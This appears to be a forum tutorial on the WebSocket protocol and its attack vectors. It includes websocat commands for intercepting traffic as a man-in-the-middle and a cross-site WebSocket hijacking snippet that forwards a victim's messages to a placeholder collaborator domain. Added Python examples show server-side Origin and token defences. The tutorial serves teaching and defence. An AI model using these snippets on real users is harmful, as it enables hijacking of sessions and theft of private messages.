WebSocket and Popular Attack Vectors #Blue Team

Hello Turk Hack Team family.
Today, we will discuss the WebSocket protocol, widely used for real-time data transfer, and its vulnerabilities.

What is WebSocket?

WebSocket is a technology that enables fast and efficient communication over the internet.

If you are someone who constantly shares things, chats, or tries to access live information on the internet, WebSocket allows you to perform these tasks much faster and smoother. For example, when tracking a sports match live, you can see every moment of the game instantly because WebSocket delivers the information to you immediately.

Alternatively, when chatting online with a friend, your messages can be exchanged almost instantly with minimal delay. All of this is made possible by WebSocket's persistent open connection. This technology not only offers fast communication but also an efficient way to communicate.

Unlike traditional methods, once a connection is established, WebSocket keeps this connection open, allowing for the instant exchange of new information. This provides great convenience, especially for those who want to track live events or use interactive applications.

In short, WebSocket is a technology that makes our internet experience faster, smoother, and more interactive. It enables real-time information exchange and easy communication with people anywhere in the world.


How are WebSocket connections established?

The establishment of WebSocket connections is like opening a fast and continuous communication line between two devices on the internet.

Starting Point:
Everything begins when a web application wants to establish a WebSocket connection with the server. This is typically triggered by the user opening a web page.

Handshake Request:
The browser sends a special HTTP request to the server. This request indicates the intention to establish a WebSocket connection.
Example:

Code:
GET /chat HTTP/1.1
Host: normal-website.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: rastgeleAnahtar
Sec-WebSocket-Version: 13

Server Response:
If the server accepts the WebSocket connection, it sends a response to the browser. This response indicates that they will now use the WebSocket protocol instead of regular HTTP:

Code:
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: birTürDoğrulamaKodu

Here, the 101 Switching Protocols status code indicates that communication will now be conducted over WebSocket. Sec-WebSocket-Accept is the server's proof that it has seen the client's Sec-WebSocket-Key and is ready for the connection.
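As an added example (not code from the original post), the following Python script implements the server side of the handshake described above: it parses the upgrade request, applies the checks a server must make before switching protocols, and derives Sec-WebSocket-Accept from Sec-WebSocket-Key the way RFC 6455 specifies (SHA-1 over the key concatenated with a fixed GUID, then base64). The sample request is constructed; its key is the example nonce from RFC 6455, and the post's placeholder key rastgeleAnahtar is also fed through to show why a real key must be 16 random bytes encoded in base64.

```python
import base64
import hashlib

# Fixed GUID from RFC 6455 section 4.2.2, appended to the client's key before hashing.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

# Constructed sample request (same shape as the post's example; the key is the
# example nonce from RFC 6455, not a value taken from the post).
SAMPLE_REQUEST = (
    "GET /chat HTTP/1.1\r\n"
    "Host: normal-website.com\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "\r\n"
)


def compute_accept(sec_websocket_key: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)), as defined in RFC 6455."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request into a dict: ':request' holds the request line,
    every header is stored under its lower-cased name."""
    lines = raw.split("\r\n")
    headers = {":request": lines[0]}
    for line in lines[1:]:
        if line == "":  # the blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def validate_upgrade(raw_request: str):
    """Apply the checks a server must make before answering 101.
    Returns (True, accept_value) on success, (False, reason) otherwise."""
    h = parse_request(raw_request)
    if not h[":request"].startswith("GET "):
        return False, "handshake must be a GET request"
    if h.get("upgrade", "").lower() != "websocket":
        return False, "missing 'Upgrade: websocket'"
    connection_tokens = [t.strip().lower() for t in h.get("connection", "").split(",")]
    if "upgrade" not in connection_tokens:
        return False, "Connection header must include 'Upgrade'"
    if h.get("sec-websocket-version") != "13":
        return False, "unsupported Sec-WebSocket-Version"
    key = h.get("sec-websocket-key", "")
    try:
        if len(base64.b64decode(key, validate=True)) != 16:
            return False, "Sec-WebSocket-Key must decode to exactly 16 bytes"
    except ValueError:  # binascii.Error is a ValueError subclass
        return False, "Sec-WebSocket-Key is not valid base64"
    return True, compute_accept(key)


def build_response(accept: str) -> str:
    """The 101 response the server sends back, mirroring the post's example."""
    return (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept}\r\n"
        "\r\n"
    )


if __name__ == "__main__":
    ok, result = validate_upgrade(SAMPLE_REQUEST)
    print(build_response(result) if ok else f"rejected: {result}")
    # The post's placeholder key is not a base64-encoded 16-byte nonce,
    # so a strict server rejects the request instead of guessing.
    bad = SAMPLE_REQUEST.replace("dGhlIHNhbXBsZSBub25jZQ==", "rastgeleAnahtar")
    print(validate_upgrade(bad))
```

The Accept value is not a secret and gives no authentication; its only job is to prove to the browser that the peer speaks WebSocket and saw this particular key, which is why a proxy that blindly echoes a cached response fails the client-side check.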

Websocat and MITM

Websocat is used to send and receive data over the internet using the WebSocket protocol.

You can use it for various purposes such as setting up an online chat room or testing real-time functionalities of a web application.

For instance, you can use the following command to connect to an existing WebSocket server:

Code:
websocat --insecure wss://10.10.10.10:8000 -v

Alternatively, you can create a WebSocket server with the following command:

Code:
websocat -s 0.0.0.0:8000

If you detect a device on your network connecting to a WebSocket server (you can do this with tools such as Wireshark), you can create attack vectors by intercepting the traffic with ARP spoofing and MITM techniques. For example, when the server tries to connect to the client, you can intercept with the following command.

Code:
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v


Cross-site WebSocket hijacking (CSWSH)

In Cross-site WebSocket hijacking (CSWSH) attacks, an attacker seizes control of a user's WebSocket connection through a malicious website. This type of attack can occur when a user believes they are establishing a secure connection with an original application. In reality, the user ends up connected to a site under the attacker's control.

For instance, when a user visits a page on the attacker's website containing malicious JavaScript code, this code executes in the user's browser and redirects the WebSocket connection to the attacker's server. In this scenario, the user unknowingly connects to a server controlled by the attacker, which can be used to steal the user's information or engage in other malicious activities.

Here is a sample JavaScript snippet for this scenario:

JavaScript:
<script>
  // Opened from the victim's browser; the URL is a placeholder for the target.
  var websocket = new WebSocket('wss://your-websocket-URL');
  websocket.onopen = start;
  websocket.onmessage = handleReply;

  function start(event) {
    websocket.send("READY"); // message sent to the attacker's server
  }

  function handleReply(event) {
    // here the attacker can capture the information coming from the user
    fetch('https://your-collaborator-domain/?' + event.data, {mode: 'no-cors'});
  }
</script>

In this scenario, the part websocket.send("READY") sends a signal to the attacker's server and initiates data exchange through the user's device. This puts the user's sensitive information at risk.

Cross-Origin and Different Subdomain with Cookie

In the Cross-Origin WebSocket hijacking (CSWSH) scenario, an attacker conducts the attack using a subdomain similar to, but not exactly the same as, the domain handling WebSocket communication.

In this type of attack, the attacker mimics the appearance of a trusted web application, redirecting users to their own malicious sites. This occurs especially when cookies are shared across different subdomains.

The attacker creates a webpage resembling the targeted original web application. Then, they embed a WebSocket connection communicating with the attacker's server into it. When a user visits this malicious page, the browser opens the WebSocket connection and sends user information to the server under the attacker's control. The attacker then seizes the user's sensitive information through this WebSocket connection. For example, the information a user sends through a messaging application is actually sent to the attacker's server and recorded by the attacker.

JavaScript:
<script src='wsHook.js'></script>
<script>
  // wsHook.before runs for every frame the page sends, wsHook.after for every
  // frame it receives; each handler forwards a copy over a plain GET request.
  wsHook.before = function(data, url) {
      var xhttp = new XMLHttpRequest();
      xhttp.open("GET", "client_msg?m=" + data, true); // outgoing message
      xhttp.send();
      return data; // pass the original frame on unchanged
  }
  wsHook.after = function(messageEvent, url, wsObject) {
      var xhttp = new XMLHttpRequest();
      xhttp.open("GET", "server_msg?m=" + messageEvent.data, true); // incoming message
      xhttp.send();
      return messageEvent;
  }
</script>
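Both the CSWSH scenario and the shared-cookie subdomain case above come down to one server-side question: does this upgrade request come from a page the application actually trusts? As an added example (not code from the original post or from the wsHook project), the following Python functions show the defender's side: a weak suffix-based Origin check, which lets any sibling subdomain and any look-alike host through, next to a strict exact-origin check, plus a per-session CSRF token in the handshake URL as a second control that does not rely on cookies. The allowlist, the session store and all origins and tokens are constructed values.

```python
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed policy: the only origins whose pages may open a WebSocket session.
ALLOWED_ORIGINS = {"https://normal-website.com", "https://app.normal-website.com"}

# Constructed session store: session cookie value -> per-session CSRF token.
SESSIONS = {"sess-1234": "tok-9f3e"}


def naive_origin_allowed(origin: str) -> bool:
    """Suffix match on the host. This is the weak check: any sibling subdomain
    and any look-alike host that merely ends in the parent domain passes, which
    is exactly the shared-cookie subdomain case described in the post."""
    host = urlsplit(origin).hostname or ""
    return host.endswith("normal-website.com")


def strict_origin_allowed(origin) -> bool:
    """Exact match of the full origin (scheme + host + port). A missing Origin
    is rejected because this server authenticates handshakes with cookies."""
    return origin is not None and origin in ALLOWED_ORIGINS


def parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def authorize_handshake(headers: dict, request_target: str):
    """Decide whether an upgrade request may be accepted.
    headers: lower-cased header names -> values; request_target: path + query.
    Returns (True, 'ok') or (False, reason)."""
    origin = headers.get("origin")
    if not strict_origin_allowed(origin):
        return False, f"origin not allowed: {origin!r}"
    session_id = parse_cookies(headers.get("cookie", "")).get("session")
    expected_token = SESSIONS.get(session_id)
    if expected_token is None:
        return False, "no valid session cookie"
    # Second control independent of cookies: a per-session token the page must
    # fetch and place in the URL. A cross-origin page cannot read it, so it
    # blocks hijacking even if the Origin allowlist were misconfigured.
    supplied = parse_qs(urlsplit(request_target).query).get("csrf", [""])[0]
    if not hmac.compare_digest(supplied, expected_token):
        return False, "missing or wrong csrf token"
    return True, "ok"


if __name__ == "__main__":
    for origin in ("https://normal-website.com",
                   "https://attacker.normal-website.com",
                   "https://evilnormal-website.com"):
        print(origin, "naive:", naive_origin_allowed(origin),
              "strict:", strict_origin_allowed(origin))
    good = {"origin": "https://normal-website.com", "cookie": "session=sess-1234"}
    print(authorize_handshake(good, "/chat?csrf=tok-9f3e"))
    hijack = {"origin": "https://attacker.normal-website.com", "cookie": "session=sess-1234"}
    print(authorize_handshake(hijack, "/chat"))
```

The hijack case carries a perfectly valid session cookie, because the browser attaches it to any handshake to the parent domain; only the Origin comparison and the token the attacker's page cannot obtain tell the two requests apart. Scoping the session cookie to the exact host (no Domain attribute) and setting SameSite removes the shared-cookie precondition in the first place.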
